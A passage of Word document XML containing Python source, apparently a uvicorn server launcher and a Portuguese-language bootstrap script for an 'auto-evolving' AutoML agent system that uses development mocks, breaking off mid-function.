    <w:p w14:paraId="2FBB367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host=host,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C247CB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port=port,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED084D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log_level="info",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086081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access_log=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0890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use_colors=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C6DB38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loop="asyncio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D4BF5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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDFD9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6CB708E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except ImportError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDB82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print(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Orquestrador não encontrado, usando guard_service: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF4E9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5FA7ED0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# Fallback para guard_service atual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483DC38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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048391B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from guard_service import app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679509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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Guard Service carregado como fallback")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714FB5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBB7B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uvicorn.run(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C493C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app,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AD2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host=host,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EC72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port=port,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA1BC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log_level="info",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36084C2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access_log=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E4A1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use_colors=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DFB1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loop="asyncio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7C44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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021C6E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8C0C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except ImportError as e2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869180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print(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro cr</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tico: Nenhum servi</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o encontrado: {e2}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB3D6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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A004E9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28D5034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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC7D2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print(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro na inicializa</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21896B3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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE35CCC" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406BD7F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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC0AA8" w14:textId="5C226115" w:rsid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main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F8EF9" w14:textId="77777777" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708D9C3F" w14:textId="394D4DA6" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suna_alsham_bootstrap.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD7F83" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01A57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SUNA-ALSHAM Bootstrap Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635E77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Sistema Auto-Evolutivo de IA com AutoML Real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE08F8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Versão: 2.1.0 - Enterprise Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAB6E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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836DD10" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCB63F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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5BFB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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158749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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CDB8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import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDD53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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA16E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from pathlib import Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E1116" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F62390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# Configuração de logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633B38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logging.basicConfig(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B8CE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level=logging.INFO,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D83BC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format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50790E7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handlers=[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BC8C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logging.StreamHandler(sys.stdout),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2A8A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logging.FileHandler('suna_alsham.log', mode='a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCDC2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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41264A3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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FAD4FB" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C9A4A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logger = logging.getLogger("SUNA-ALSHAM-BOOTSTRAP")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF9F06" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59446DA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def setup_environment():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312FED5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"""Configura o ambiente do sistema."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B139F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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Configurando ambiente SUNA-ALSHAM...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280968E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0C0A849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# Adicionar diretório raiz ao PYTHONPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E704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project_root = Path(__file__).parent.absolute()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576F7B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if str(project_root) not in sys.path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009F4B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sys.path.insert(0, str(project_root))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE8E2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08A1A2A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# Verificar variáveis de ambiente essenciais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8B02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required_vars = ['SUPABASE_URL', 'SUPABASE_KEY']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA0AA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missing_vars = [var for var in required_vars if not os.getenv(var)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44377DA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1FDBAF4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if missing_vars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E11C0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logger.warning(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Variáveis de ambiente não configuradas: {missing_vars}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFDFAF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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema funcionará em modo de desenvolvimento")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399179D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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC427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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Vari</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>veis de ambiente configuradas")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D9CE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17C9181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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD2F53" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FD534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def import_system_components():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F9EC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"""Importa os componentes do sistema."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A508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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Importando componentes do sistema...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FC248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16ACEE0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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334E41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# Tentar importar componentes principais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EA31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from backend.agent.alsham.core_agent import CoreAgent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756287C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from backend.agent.alsham.config import CoreAgentConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60010FB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23C53268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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Componentes principais importados com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B7F78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return CoreAgent, CoreAgentConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6079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221D31E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except ImportError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550F1CF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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro ao importar componentes: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD616B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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Criando componentes mock para desenvolvimento...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332BAD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1C3742D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# Componentes mock para desenvolvimento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D1A4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class MockCoreAgent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B641F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def __init__(self, config=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DFD6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self.agent_id = "mock-core-agent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BEE2E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self.name = "CORE_AUTOML_MOCK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413C89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self.enabled = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603B27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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mock Core Agent inicializado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E3002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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D89F8D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def run_evolution_cycle(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B2E2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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Executando ciclo de evolução mock...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7AD3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time.sleep(2)  # Simular processamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C352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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EDE1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    "success": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA436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    "message": "Mock evolution cycle completed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8078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    "improvement_percentage": 12.5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B069D38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    "method": "mock_automl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA1D8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB6FA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6057289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class MockConfig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC26C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def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2893E8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self.enabled = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF0F8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self.min_improvement_percentage = 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3D61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51F9B3C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return MockCoreAgent, MockConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372043F" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7819DED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def initialize_core_agent():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387DFC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"""Inicializa o Core Agent AutoML."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA0121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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Inicializando Core Agent AutoML...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE28C1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37252DB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28588E4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CoreAgent, CoreAgentConfig = import_system_components()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856A20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5E93439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# Configurar Core Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52947ED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config = CoreAgentConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D23A5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core_agent = CoreAgent(config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16209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24EBE3D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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Core Agent inicializado - ID: {core_agent.agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FA8E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return core_agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4FC04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308FF7C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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E223A0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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro ao inicializar Core Agent: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A08F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return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD702C9" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6292BA0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def run_evolution_cycle(core_agent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F8672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"""Executa um ciclo de evolução."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B1D1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if not core_agent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8AD5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logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Core Agent n</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o dispon</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vel")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF9BB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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6631B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618D4E8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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B962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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando ciclo de evolução AutoML...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288BED3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result = core_agent.run_evolution_cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1961A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37C32BD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if result.get('success'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557696F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improvement = result.get('improvement_percentage', 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418AB88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method = result.get('method', 'unknown')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D7013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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30568ED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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do com sucesso!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1E11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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Melhoria: {improvement:.2f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14EED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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔬</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Método: {method}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AC25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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F159E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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D324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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
